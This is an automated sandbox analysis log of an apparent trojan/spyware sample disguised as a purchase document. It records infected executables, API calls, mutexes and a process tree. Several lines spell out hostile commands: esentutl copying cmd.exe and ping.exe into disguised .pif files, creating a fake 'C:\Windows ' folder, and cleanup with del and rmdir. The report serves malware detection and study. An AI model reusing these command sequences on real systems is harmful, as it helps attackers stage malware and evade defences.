                  Source: notification_helper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrome_proxy.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: crashreporter.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: default-browser-agent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: firefox.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateBroker.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateCore.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdateOnDemand.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jabswitch.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: DiagnosticsHub.StandardCollector.Service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: FXSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
                  Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/171@31/13
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B17FD2 GetDiskFreeSpaceA,0_2_02B17FD2
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_1_004019F0
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeCode function: 0_2_02B26DC8 CoCreateInstance,0_2_02B26DC8
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCode function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,9_1_004019F0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-3f155f6931e417df62e80848-b
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifMutant created: NULL
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-3f155f6931e417df-inf
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                  Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-3f155f6931e417df9ea72c54-b
                  Source: C:\Windows\System32\FXSSVC.exeFile created: C:\Windows\TEMP\FXSSVCDebugLogFile.txt
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifCommand line argument: 08A9_1_00413780
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeReversingLabs: Detection: 36%
                  Source: PURCHASE REQUIRED DETAILS 000487958790903403.exeVirustotal: Detection: 43%
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeFile read: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe"
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ymafvvdS.cmd" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe /d C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF /o
                  Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess created: C:\Users\Public\Libraries\ymafvvdS.pif C:\Users\Public\Libraries\ymafvvdS.pif
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                  Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                  Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                  Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknownProcess created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                  Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                  Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                  Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                  Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ymafvvdS.cmd" "Jump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe /d C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF /oJump to behavior
                  Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exeProcess created: C:\Users\Public\Libraries\ymafvvdS.pif C:\Users\Public\Libraries\ymafvvdS.pifJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /oJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
                  Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
